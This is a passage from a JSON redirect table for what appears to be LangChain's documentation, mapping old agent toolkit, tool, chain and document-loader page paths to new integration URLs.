"/docs/integrations/toolkits/csv" }, { "source": "/docs/modules/agents/toolkits/csv", "destination": "/docs/integrations/toolkits/csv" }, { "source": "/en/latest/modules/agents/toolkits/examples/gmail.html", "destination": "/docs/integrations/toolkits/gmail" }, { "source": "/docs/modules/agents/toolkits/gmail", "destination": "/docs/integrations/toolkits/gmail" }, { "source": "/en/latest/modules/agents/toolkits/examples/jira.html", "destination": "/docs/integrations/toolkits/jira" }, { "source": "/docs/modules/agents/toolkits/jira", "destination": "/docs/integrations/toolkits/jira" }, { "source": "/en/latest/modules/agents/toolkits/examples/json.html", "destination": "/docs/integrations/toolkits/json" }, { "source": "/docs/modules/agents/toolkits/json", "destination": "/docs/integrations/toolkits/json" }, { "source": "/en/latest/modules/agents/toolkits/examples/openapi.html", "destination": "/docs/integrations/toolkits/openapi" }, { "source": "/docs/modules/agents/toolkits/openapi", "destination": "/docs/integrations/toolkits/openapi" }, { "source": "/en/latest/modules/agents/toolkits/examples/openapi_nla.html", "destination": "/docs/integrations/toolkits/openapi_nla" }, { "source": "/docs/modules/agents/toolkits/openapi_nla", "destination": "/docs/integrations/toolkits/openapi_nla" }, { "source": "/en/latest/modules/agents/toolkits/examples/pandas.html", "destination": "/docs/integrations/toolkits/pandas" }, { "source": "/docs/modules/agents/toolkits/pandas", "destination": "/docs/integrations/toolkits/pandas" }, { "source": "/en/latest/modules/agents/toolkits/examples/playwright.html", "destination": "/docs/integrations/toolkits/playwright" }, { "source": "/docs/modules/agents/toolkits/playwright", "destination": "/docs/integrations/toolkits/playwright" }, { "source": "/en/latest/modules/agents/toolkits/examples/powerbi.html", "destination": "/docs/integrations/toolkits/powerbi" }, { "source": "/docs/modules/agents/toolkits/powerbi", "destination": "/docs/integrations/toolkits/powerbi" }, { "source": "/en/latest/modules/agents/toolkits/examples/python.html", "destination": "/docs/integrations/toolkits/python" }, { "source": "/docs/modules/agents/toolkits/python", "destination": "/docs/integrations/toolkits/python" }, { "source": "/en/latest/modules/agents/toolkits/examples/spark.html", "destination": "/docs/integrations/toolkits/spark" }, { "source": "/docs/modules/agents/toolkits/spark", "destination": "/docs/integrations/toolkits/spark" }, { "source": "/en/latest/modules/agents/toolkits/examples/spark_sql.html", "destination": "/docs/integrations/toolkits/spark_sql" }, { "source": "/docs/modules/agents/toolkits/spark_sql", "destination": "/docs/integrations/toolkits/spark_sql" }, { "source": "/en/latest/modules/agents/toolkits/examples/sql_database.html", "destination": "/docs/integrations/toolkits/sql_database" }, { "source": "/docs/modules/agents/toolkits/sql_database", "destination": "/docs/integrations/toolkits/sql_database" }, { "source": "/en/latest/modules/agents/toolkits/examples/vectorstore.html", "destination": "/docs/integrations/toolkits/vectorstore" }, { "source": "/docs/modules/agents/toolkits/vectorstore", "destination": "/docs/integrations/toolkits/vectorstore" }, { "source": "/docs/modules/agents/toolkits/amadeus", "destination": "/docs/integrations/toolkits/amadeus" }, { "source": "/docs/modules/agents/toolkits/github", "destination": "/docs/integrations/toolkits/github" }, { "source": "/docs/modules/agents/toolkits/multion", "destination": "/docs/integrations/toolkits/multion" }, { "source": "/en/latest/modules/agents/tools/custom_tools.html", "destination": "/docs/modules/agents/tools/how_to/custom_tools" }, { "source": "/en/latest/modules/agents/tools/human_approval.html", "destination": "/docs/modules/agents/tools/how_to/human_approval" }, { "source": "/en/latest/modules/agents/tools/multi_input_tool.html", "destination": "/docs/modules/agents/tools/how_to/multi_input_tool" }, { "source": "/en/latest/modules/agents/tools/tool_input_validation.html", "destination": "/docs/modules/agents/tools/how_to/tool_input_validation" }, { "source": "/en/latest/modules/agents/tools/tools_as_openai_functions.html", "destination": "/docs/modules/agents/tools/how_to/tools_as_openai_functions" }, { "source": "/en/latest/modules/agents/tools/examples/apify.html", "destination": "/docs/integrations/tools/apify" }, { "source": "/docs/modules/agents/tools/integrations/apify", "destination": "/docs/integrations/tools/apify" }, { "source": "/en/latest/modules/agents/tools/examples/arxiv.html", "destination": "/docs/integrations/tools/arxiv" }, { "source": "/docs/modules/agents/tools/integrations/arxiv", "destination": "/docs/integrations/tools/arxiv" }, { "source": "/en/latest/modules/agents/tools/examples/awslambda.html", "destination": "/docs/integrations/tools/awslambda" }, { "source": "/docs/modules/agents/tools/integrations/awslambda", "destination": "/docs/integrations/tools/awslambda" }, { "source": "/en/latest/modules/agents/tools/examples/bing_search.html", "destination": "/docs/integrations/tools/bing_search" }, { "source": "/docs/modules/agents/tools/integrations/bing_search", "destination": "/docs/integrations/tools/bing_search" }, { "source": "/en/latest/modules/agents/tools/examples/brave_search.html", "destination": "/docs/integrations/tools/brave_search" }, { "source": "/docs/modules/agents/tools/integrations/brave_search", "destination": "/docs/integrations/tools/brave_search" }, { "source": "/en/latest/modules/agents/tools/examples/chatgpt_plugins.html", "destination": "/docs/integrations/tools/chatgpt_plugins" }, { "source": "/docs/modules/agents/tools/integrations/chatgpt_plugins", "destination": "/docs/integrations/tools/chatgpt_plugins" }, { "source": "/en/latest/modules/agents/tools/examples/ddg.html", "destination": "/docs/integrations/tools/ddg" }, { "source": "/docs/modules/agents/tools/integrations/ddg", "destination": "/docs/integrations/tools/ddg" }, { "source": "/en/latest/modules/agents/tools/examples/filesystem.html", "destination": "/docs/integrations/tools/filesystem" }, { "source": "/docs/modules/agents/tools/integrations/filesystem", "destination": "/docs/integrations/tools/filesystem" }, { "source": "/en/latest/modules/agents/tools/examples/google_places.html", "destination": "/docs/integrations/tools/google_places" }, { "source": "/docs/modules/agents/tools/integrations/google_places", "destination": "/docs/integrations/tools/google_places" }, { "source": "/en/latest/modules/agents/tools/examples/google_search.html", "destination": "/docs/integrations/tools/google_search" }, { "source": "/docs/modules/agents/tools/integrations/google_search", "destination": "/docs/integrations/tools/google_search" }, { "source": "/en/latest/modules/agents/tools/examples/google_serper.html", "destination": "/docs/integrations/tools/google_serper" }, { "source": "/docs/modules/agents/tools/integrations/google_serper", "destination": "/docs/integrations/tools/google_serper" }, { "source": "/en/latest/modules/agents/tools/examples/gradio_tools.html", "destination": "/docs/integrations/tools/gradio_tools" }, { "source": "/docs/modules/agents/tools/integrations/gradio_tools", "destination": "/docs/integrations/tools/gradio_tools" }, { "source": "/en/latest/modules/agents/tools/examples/graphql.html", "destination": "/docs/integrations/tools/graphql" }, { "source": "/docs/modules/agents/tools/integrations/graphql", "destination": "/docs/integrations/tools/graphql" }, { "source": "/en/latest/modules/agents/tools/examples/huggingface_tools.html", "destination": "/docs/integrations/tools/huggingface_tools" }, { "source": "/docs/modules/agents/tools/integrations/huggingface_tools", "destination": "/docs/integrations/tools/huggingface_tools" }, { "source": "/en/latest/modules/agents/tools/examples/human_tools.html", "destination": "/docs/integrations/tools/human_tools" }, { "source": "/docs/modules/agents/tools/integrations/human_tools", "destination": "/docs/integrations/tools/human_tools" }, { "source": "/en/latest/modules/agents/tools/examples/ifttt.html", "destination": "/docs/integrations/tools/ifttt" }, { "source": "/docs/modules/agents/tools/integrations/ifttt", "destination": "/docs/integrations/tools/ifttt" }, { "source": "/en/latest/modules/agents/tools/examples/metaphor_search.html", "destination": "/docs/integrations/tools/metaphor_search" }, { "source": "/docs/modules/agents/tools/integrations/metaphor_search", "destination": "/docs/integrations/tools/metaphor_search" }, { "source": "/en/latest/modules/agents/tools/examples/openweathermap.html", "destination": "/docs/integrations/tools/openweathermap" }, { "source": "/docs/modules/agents/tools/integrations/openweathermap", "destination": "/docs/integrations/tools/openweathermap" }, { "source": "/en/latest/modules/agents/tools/examples/pubmed.html", "destination": "/docs/integrations/tools/pubmed" }, { "source": "/docs/modules/agents/tools/integrations/pubmed", "destination": "/docs/integrations/tools/pubmed" }, { "source": "/en/latest/modules/agents/tools/examples/requests.html", "destination": "/docs/integrations/tools/requests" }, { "source": "/docs/modules/agents/tools/integrations/requests", "destination": "/docs/integrations/tools/requests" }, { "source": "/en/latest/modules/agents/tools/examples/sceneXplain.html", "destination": "/docs/integrations/tools/sceneXplain" }, { "source": "/docs/modules/agents/tools/integrations/sceneXplain", "destination": "/docs/integrations/tools/sceneXplain" }, { "source": "/en/latest/modules/agents/tools/examples/search_tools.html", "destination": "/docs/integrations/tools/search_tools" }, { "source": "/docs/modules/agents/tools/integrations/search_tools", "destination": "/docs/integrations/tools/search_tools" }, { "source": "/en/latest/modules/agents/tools/examples/searx_search.html", "destination": "/docs/integrations/tools/searx_search" }, { "source": "/docs/modules/agents/tools/integrations/searx_search", "destination": "/docs/integrations/tools/searx_search" }, { "source": "/en/latest/modules/agents/tools/examples/serpapi.html", "destination": "/docs/integrations/tools/serpapi" }, { "source": "/docs/modules/agents/tools/integrations/serpapi", "destination": "/docs/integrations/tools/serpapi" }, { "source": "/en/latest/modules/agents/tools/examples/twilio.html", "destination": "/docs/integrations/tools/twilio" }, { "source": "/docs/modules/agents/tools/integrations/twilio", "destination": "/docs/integrations/tools/twilio" }, { "source": "/en/latest/modules/agents/tools/examples/wikipedia.html", "destination": "/docs/integrations/tools/wikipedia" }, { "source": "/docs/modules/agents/tools/integrations/wikipedia", "destination": "/docs/integrations/tools/wikipedia" }, { "source": "/en/latest/modules/agents/tools/examples/wolfram_alpha.html", "destination": "/docs/integrations/tools/wolfram_alpha" }, { "source": "/docs/modules/agents/tools/integrations/wolfram_alpha", "destination": "/docs/integrations/tools/wolfram_alpha" }, { "source": "/en/latest/modules/agents/tools/examples/youtube.html", "destination": "/docs/integrations/tools/youtube" }, { "source": "/docs/modules/agents/tools/integrations/youtube", "destination": "/docs/integrations/tools/youtube" }, { "source": "/en/latest/modules/agents/tools/examples/zapier.html", "destination": "/docs/integrations/tools/zapier" }, { "source": "/docs/modules/agents/tools/integrations/zapier", "destination": "/docs/integrations/tools/zapier" }, { "source": "/en/latest/modules/callbacks/filecallbackhandler.html", "destination": "/docs/modules/callbacks/how_to/filecallbackhandler" }, { "source": "/en/latest/modules/callbacks/examples/argilla.html", "destination": "/docs/integrations/callbacks/argilla" }, { "source": "/docs/modules/callbacks/integrations/argilla", "destination": "/docs/integrations/callbacks/argilla" }, { "source": "/en/latest/modules/chains/examples/extraction.html", "destination": "/docs/modules/chains/additional/extraction" }, { "source": "/en/latest/modules/chains/examples/flare.html", "destination": "/docs/use_cases/question_answering/how_to/flare" }, { "source": "/en/latest/modules/chains/examples/graph_cypher_qa.html", "destination": "/docs/use_cases/graph/graph_cypher_qa" }, { "source": "/en/latest/modules/chains/examples/graph_nebula_qa.html", "destination": "/docs/use_cases/graph/graph_nebula_qa" }, { "source": "/en/latest/modules/chains/index_examples/graph_qa.html", "destination": "/docs/use_cases/graph/graph_qa" }, { "source": "/en/latest/modules/chains/index_examples/hyde.html", "destination": "/docs/use_cases/question_answering/how_to/hyde" }, { "source": "/en/latest/modules/chains/examples/llm_bash.html", "destination": "/docs/use_cases/code_writing/llm_bash" }, { "source": "/en/latest/modules/chains/examples/llm_checker.html", "destination": "/docs/use_cases/self_check/llm_checker" }, { "source": "/en/latest/modules/chains/examples/llm_math.html", "destination": "/docs/use_cases/code_writing/llm_math" }, { "source": "/en/latest/modules/chains/examples/llm_requests.html", "destination": "/docs/use_cases/apis/llm_requests" }, { "source": "/en/latest/modules/chains/examples/llm_summarization_checker.html", "destination": "/docs/use_cases/self_check/llm_summarization_checker" }, { "source": "/en/latest/modules/chains/examples/openapi.html", "destination": "/docs/use_cases/apis/openapi" }, { "source": "/en/latest/modules/chains/examples/pal.html", "destination": "/docs/use_cases/code_writing/pal" }, { "source": "/en/latest/modules/chains/examples/tagging.html", "destination": "/docs/use_cases/tagging" }, { "source": "/en/latest/modules/chains/index_examples/vector_db_text_generation.html", "destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation" }, { "source": "/en/latest/modules/chains/generic/router.html", "destination": "/docs/modules/chains/foundational/router" }, { "source": "/en/latest/modules/chains/generic/transformation.html", "destination": "/docs/modules/chains/foundational/transformation" }, { "source": "/en/latest/modules/chains/generic/async_chain.html", "destination": "/docs/modules/chains/how_to/async_chain" }, { "source": "/en/latest/modules/chains/generic/custom_chain.html", "destination": "/docs/modules/chains/how_to/custom_chain" }, { "source": "/en/latest/modules/chains/generic/from_hub.html", "destination": "/docs/modules/chains/how_to/from_hub" }, { "source": "/en/latest/modules/chains/generic/serialization.html", "destination": "/docs/modules/chains/how_to/serialization" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/acreom.html", "destination": "/docs/integrations/document_loaders/acreom" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/acreom", "destination": "/docs/integrations/document_loaders/acreom" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/airbyte_json.html", "destination": "/docs/integrations/document_loaders/airbyte_json" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/airbyte_json", "destination": "/docs/integrations/document_loaders/airbyte_json" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/airtable.html", "destination": "/docs/integrations/document_loaders/airtable" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/airtable", "destination": "/docs/integrations/document_loaders/airtable" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/alibaba_cloud_maxcompute.html", "destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/alibaba_cloud_maxcompute", "destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/apify_dataset.html", "destination": "/docs/integrations/document_loaders/apify_dataset" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/apify_dataset", "destination": "/docs/integrations/document_loaders/apify_dataset" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/arxiv.html", "destination": "/docs/integrations/document_loaders/arxiv" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/arxiv", "destination": "/docs/integrations/document_loaders/arxiv" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_directory.html", "destination": "/docs/integrations/document_loaders/aws_s3_directory" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_directory", "destination": "/docs/integrations/document_loaders/aws_s3_directory" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_file.html", "destination": "/docs/integrations/document_loaders/aws_s3_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_file", "destination": "/docs/integrations/document_loaders/aws_s3_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azlyrics.html", "destination": "/docs/integrations/document_loaders/azlyrics" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azlyrics", "destination": "/docs/integrations/document_loaders/azlyrics" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_container.html", "destination": "/docs/integrations/document_loaders/azure_blob_storage_container" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_container", "destination": "/docs/integrations/document_loaders/azure_blob_storage_container" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_file.html", "destination": "/docs/integrations/document_loaders/azure_blob_storage_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_file", "destination": "/docs/integrations/document_loaders/azure_blob_storage_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/bibtex.html", "destination": "/docs/integrations/document_loaders/bibtex" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/bibtex", "destination": "/docs/integrations/document_loaders/bibtex" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/bilibili.html", "destination": "/docs/integrations/document_loaders/bilibili" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/bilibili", "destination": "/docs/integrations/document_loaders/bilibili" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/blackboard.html", "destination": "/docs/integrations/document_loaders/blackboard" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/blackboard", "destination": "/docs/integrations/document_loaders/blackboard" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/blockchain.html", "destination": "/docs/integrations/document_loaders/blockchain" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/blockchain", "destination": "/docs/integrations/document_loaders/blockchain" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/chatgpt_loader.html", "destination": "/docs/integrations/document_loaders/chatgpt_loader" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/chatgpt_loader", "destination": "/docs/integrations/document_loaders/chatgpt_loader" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/college_confidential.html", "destination": "/docs/integrations/document_loaders/college_confidential" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/college_confidential", "destination": "/docs/integrations/document_loaders/college_confidential" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/confluence.html", "destination": "/docs/integrations/document_loaders/confluence" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/confluence", "destination": "/docs/integrations/document_loaders/confluence" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/conll-u.html", "destination": "/docs/integrations/document_loaders/conll-u" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/conll-u", "destination": "/docs/integrations/document_loaders/conll-u" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/copypaste.html", "destination": "/docs/integrations/document_loaders/copypaste" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/copypaste", "destination": "/docs/integrations/document_loaders/copypaste" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/csv.html", "destination": "/docs/integrations/document_loaders/csv" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/csv", "destination": "/docs/integrations/document_loaders/csv" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/diffbot.html", "destination": "/docs/integrations/document_loaders/diffbot" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/diffbot", "destination": "/docs/integrations/document_loaders/diffbot" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/discord.html", "destination": "/docs/integrations/document_loaders/discord" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/discord", "destination": "/docs/integrations/document_loaders/discord" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/docugami.html", "destination": "/docs/integrations/document_loaders/docugami" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/docugami", "destination": "/docs/integrations/document_loaders/docugami" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/duckdb.html", "destination": "/docs/integrations/document_loaders/duckdb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/duckdb", "destination": "/docs/integrations/document_loaders/duckdb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/email.html", "destination": "/docs/integrations/document_loaders/email" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/email", "destination": "/docs/integrations/document_loaders/email" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/embaas.html", "destination": "/docs/integrations/document_loaders/embaas" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/embaas", "destination": "/docs/integrations/document_loaders/embaas" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/epub.html", "destination": "/docs/integrations/document_loaders/epub" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/epub", "destination": "/docs/integrations/document_loaders/epub" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/evernote.html", "destination": "/docs/integrations/document_loaders/evernote" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/evernote", "destination": "/docs/integrations/document_loaders/evernote" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/excel.html", "destination": "/docs/integrations/document_loaders/excel" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/excel", "destination": "/docs/integrations/document_loaders/excel" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/facebook_chat.html", "destination": "/docs/integrations/document_loaders/facebook_chat" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/facebook_chat", "destination": "/docs/integrations/document_loaders/facebook_chat" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/fauna.html", "destination": "/docs/integrations/document_loaders/fauna" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/fauna", "destination": "/docs/integrations/document_loaders/fauna" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/figma.html", "destination": "/docs/integrations/document_loaders/figma" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/figma", "destination": "/docs/integrations/document_loaders/figma" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/git.html", "destination": "/docs/integrations/document_loaders/git" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/git", "destination": "/docs/integrations/document_loaders/git" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/gitbook.html", "destination": "/docs/integrations/document_loaders/gitbook" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/gitbook", "destination": "/docs/integrations/document_loaders/gitbook" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/github.html", "destination": "/docs/integrations/document_loaders/github" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/github", "destination": "/docs/integrations/document_loaders/github" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_bigquery.html", "destination": "/docs/integrations/document_loaders/google_bigquery" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_bigquery", "destination": "/docs/integrations/document_loaders/google_bigquery" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_directory.html", "destination": "/docs/integrations/document_loaders/google_cloud_storage_directory" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_directory", "destination": "/docs/integrations/document_loaders/google_cloud_storage_directory" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_file.html", "destination": "/docs/integrations/document_loaders/google_cloud_storage_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_file", "destination": "/docs/integrations/document_loaders/google_cloud_storage_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_drive.html", "destination": "/docs/integrations/document_loaders/google_drive" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_drive", "destination": "/docs/integrations/document_loaders/google_drive" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/gutenberg.html", "destination": "/docs/integrations/document_loaders/gutenberg" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/gutenberg", "destination": "/docs/integrations/document_loaders/gutenberg" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/hacker_news.html", "destination": "/docs/integrations/document_loaders/hacker_news" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/hacker_news", "destination": "/docs/integrations/document_loaders/hacker_news" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/hugging_face_dataset.html", "destination": "/docs/integrations/document_loaders/hugging_face_dataset" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/hugging_face_dataset", "destination": "/docs/integrations/document_loaders/hugging_face_dataset" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/ifixit.html", "destination": "/docs/integrations/document_loaders/ifixit" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/ifixit", "destination": "/docs/integrations/document_loaders/ifixit" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/image.html", "destination": "/docs/integrations/document_loaders/image" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/image", "destination": "/docs/integrations/document_loaders/image" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/image_captions.html", "destination": "/docs/integrations/document_loaders/image_captions" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/image_captions", "destination": "/docs/integrations/document_loaders/image_captions" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/imsdb.html", "destination": "/docs/integrations/document_loaders/imsdb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/imsdb", "destination": "/docs/integrations/document_loaders/imsdb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/iugu.html", "destination": "/docs/integrations/document_loaders/iugu" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/iugu", "destination": "/docs/integrations/document_loaders/iugu" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/joplin.html", "destination": "/docs/integrations/document_loaders/joplin" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/joplin", "destination": "/docs/integrations/document_loaders/joplin" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/jupyter_notebook.html", "destination": "/docs/integrations/document_loaders/jupyter_notebook" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/jupyter_notebook", "destination": "/docs/integrations/document_loaders/jupyter_notebook" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/mastodon.html", "destination": "/docs/integrations/document_loaders/mastodon" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/mastodon", "destination": "/docs/integrations/document_loaders/mastodon" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/mediawikidump.html", "destination": "/docs/integrations/document_loaders/mediawikidump" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/mediawikidump", "destination": "/docs/integrations/document_loaders/mediawikidump" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_onedrive.html", "destination": "/docs/integrations/document_loaders/microsoft_onedrive" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_onedrive", "destination": "/docs/integrations/document_loaders/microsoft_onedrive" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_powerpoint.html", "destination": "/docs/integrations/document_loaders/microsoft_powerpoint" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_powerpoint", "destination": "/docs/integrations/document_loaders/microsoft_powerpoint" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_word.html", "destination": "/docs/integrations/document_loaders/microsoft_word" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_word", "destination": "/docs/integrations/document_loaders/microsoft_word" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/modern_treasury.html", "destination": "/docs/integrations/document_loaders/modern_treasury" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/modern_treasury", "destination": "/docs/integrations/document_loaders/modern_treasury" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/notion.html", "destination": "/docs/integrations/document_loaders/notion" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/notion", "destination": "/docs/integrations/document_loaders/notion" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/notiondb.html", "destination": "/docs/integrations/document_loaders/notiondb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/notiondb", "destination": "/docs/integrations/document_loaders/notiondb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/obsidian.html", "destination": "/docs/integrations/document_loaders/obsidian" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/obsidian", "destination": "/docs/integrations/document_loaders/obsidian" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/odt.html", "destination": "/docs/integrations/document_loaders/odt" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/odt", "destination": "/docs/integrations/document_loaders/odt" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/pandas_dataframe.html", "destination": "/docs/integrations/document_loaders/pandas_dataframe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/pandas_dataframe", "destination": "/docs/integrations/document_loaders/pandas_dataframe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/psychic.html", "destination": "/docs/integrations/document_loaders/psychic" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/psychic", "destination": "/docs/integrations/document_loaders/psychic" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/pyspark_dataframe.html", "destination": "/docs/integrations/document_loaders/pyspark_dataframe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/pyspark_dataframe", "destination": "/docs/integrations/document_loaders/pyspark_dataframe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/readthedocs_documentation.html", "destination": "/docs/integrations/document_loaders/readthedocs_documentation" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/readthedocs_documentation", "destination": "/docs/integrations/document_loaders/readthedocs_documentation" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/reddit.html", "destination": "/docs/integrations/document_loaders/reddit" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/reddit", "destination": "/docs/integrations/document_loaders/reddit" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/roam.html", "destination": "/docs/integrations/document_loaders/roam" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/roam", "destination": "/docs/integrations/document_loaders/roam" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/sitemap.html", "destination": "/docs/integrations/document_loaders/sitemap" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/sitemap", "destination": "/docs/integrations/document_loaders/sitemap" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/slack.html", "destination": "/docs/integrations/document_loaders/slack" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/slack", "destination": "/docs/integrations/document_loaders/slack" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/snowflake.html", "destination": "/docs/integrations/document_loaders/snowflake" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/snowflake", "destination": "/docs/integrations/document_loaders/snowflake" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/spreedly.html", "destination": "/docs/integrations/document_loaders/spreedly" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/spreedly", "destination": "/docs/integrations/document_loaders/spreedly" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/stripe.html", "destination": "/docs/integrations/document_loaders/stripe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/stripe", "destination": "/docs/integrations/document_loaders/stripe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/subtitle.html", "destination": "/docs/integrations/document_loaders/subtitle" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/subtitle", "destination": "/docs/integrations/document_loaders/subtitle" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/telegram.html", "destination": "/docs/integrations/document_loaders/telegram" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/telegram", "destination": 